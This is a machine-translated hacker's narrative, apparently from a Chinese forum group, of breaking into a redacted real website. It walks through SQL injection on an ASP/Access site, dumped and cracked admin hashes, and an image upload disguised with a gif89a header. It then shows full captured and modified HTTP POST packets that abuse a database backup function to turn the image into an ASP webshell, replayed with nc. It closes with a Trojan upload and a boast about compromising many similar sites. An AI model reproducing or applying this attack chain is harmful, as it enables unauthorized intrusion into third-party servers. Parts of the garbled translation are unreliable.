Get webshell through background packet capture backup

Http://www.xxxxxx.com/

The page looks good, but it's messy.
Click a link,Http://www.xxxxxx.com/view_new.asp? Id = 204 & cid = 24
Adding and 1 = 1 and 1 = 2 seems to be filtered out, and all of them return to the normal page.
Remove "& cid = 2" and press enter again to check and 1 = 1 and 1 = 2.
Return to different pages and check whether the injection vulnerability exists.

This vulnerability is simple and directly thrown into domain guesses.
The access database. Further guesses: (inserting code and posting means there are not enough characters !)
==========================================================
Congratulations, this URL can be injected!
Database Type: Access Database
Tip 1: All table names have been guessed!
Tip 2: All column names have been guessed!
Range: 5 Records in total!
Password: 4139bf7cbbc3a1fb
Password: 4139bf7cbbc3a1fb
Password content: e034b3929bbe2d5b
Password content: ef58d7605c06bb3a
Password: f77f6b2d4ed4a2f0
All detection completed!
========================================================
Take the first password to xmd5.org. It has a good character and records 195802.
Eager to scan the background, the character continues to rise and suddenly found.
Http://www.xxxxxx.com/admin/
Enter the admin password 195802 and the page is blank? The address is admin/login. asp.
Is it difficult for the Administrator to delete login. asp?
Don't worry, use Wwwscan to scan the background address.
GetHttp://www.xxxxxx.com/admin/left.htm
The navigation bar is displayed!

Have a play!
Add an article first. The upload function is available.
After modifying the headers, add gif89a and change the suffix to. gif. Uploaded successfully!
The obtained URL is ../userpic/201012514755680.gif.

Now that you have the navigation bar, check the database backup function.
Http://www.xxxxxx.com/admin/dbback.asp
The path cannot be modified!

As a cainiao, when I was preparing to lament and give up, I suddenly remembered that such database backup restrictions should be broken through packet capture and modification!
Try to use winsock to capture packets.

The packet capture content is:
========================================================== ====

POST/admin/dbback. asp? Action = return HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd. ms-xpsdocument, application/xaml + xml ,*/*
Referer:Http://www.xxxxxx.com/admin/dbback.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 665; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1;Http://bsalsa.com); CBA;. NET CLR 2.0.50727;. NET CLR 3.0.20.6.2152;. NET CLR 3.5.30729;. NET CLR 1.1.4322)
Host:Www.xxxxxx.com
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQABDDRCD = GAGLCDDBNNDBALIBKBGPNNKGcurrf = date % 2Fdata. asp & backf = dbback & backfy = backup. mdb & Submit = % B1 % B8 % B7 % DD

========================================================== ======

The path and name appear at the end!
The URL signature is used to obtain the image address. The URL signature is 2e00002e00002fuserpic00002f201012514755680.gif.
Change backup. mdb to safe. asp.
Then, let's take a look at the degree and change the length to 93.
The changed package is as follows:
========================================================== ==================

POST/admin/dbback. asp? Action = return HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd. ms-xpsdocument, application/xaml + xml ,*/*
Referer:Http://www.xxxxxx.com/admin/dbback.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 665; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1;Http://bsalsa.com); CBA;. NET CLR 2.0.50727;. NET CLR 3.0.20.6.2152;. NET CLR 3.5.30729;. NET CLR 1.1.4322)
Host:Www.xxxxxx.com
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Secure & backf = dbback & backfy = safe. asp & Submit = % B1 % B8 % B7 % DD

========================================================== ====================

Check port 20480

Take out the ghost weapon nc!
Run the nc command under cmd.Www.xxxxxx.com20480 <nc.txt (nc.txt is a data packet)
Wait a moment.
Enter the pony address:Http://www.xxxxxx.com/admin/dbback/safe.asp
Oh, webshell is ready!

Upload a Trojan and check whether it looks like a VM.
Use rootkit.net.cn to bypass

A large number of websites are bound!
Look at other sites, and there are almost all exploitation Processes similar to this vulnerability: Injection-guessing-backend (admin/login. asp)-image-Database Backup (if you don't have one, you can --)
The injection vulnerability is everywhere! I don't play anymore ~ It is useless to get so many dummies webshells.
There are a lot of such silly vulnerabilities in China, and I would like to remind webmasters to raise their security awareness! Less filter and 1 = 1 (-_-!)

 

 

2h0ngHe [B. H.S. T] and qing edit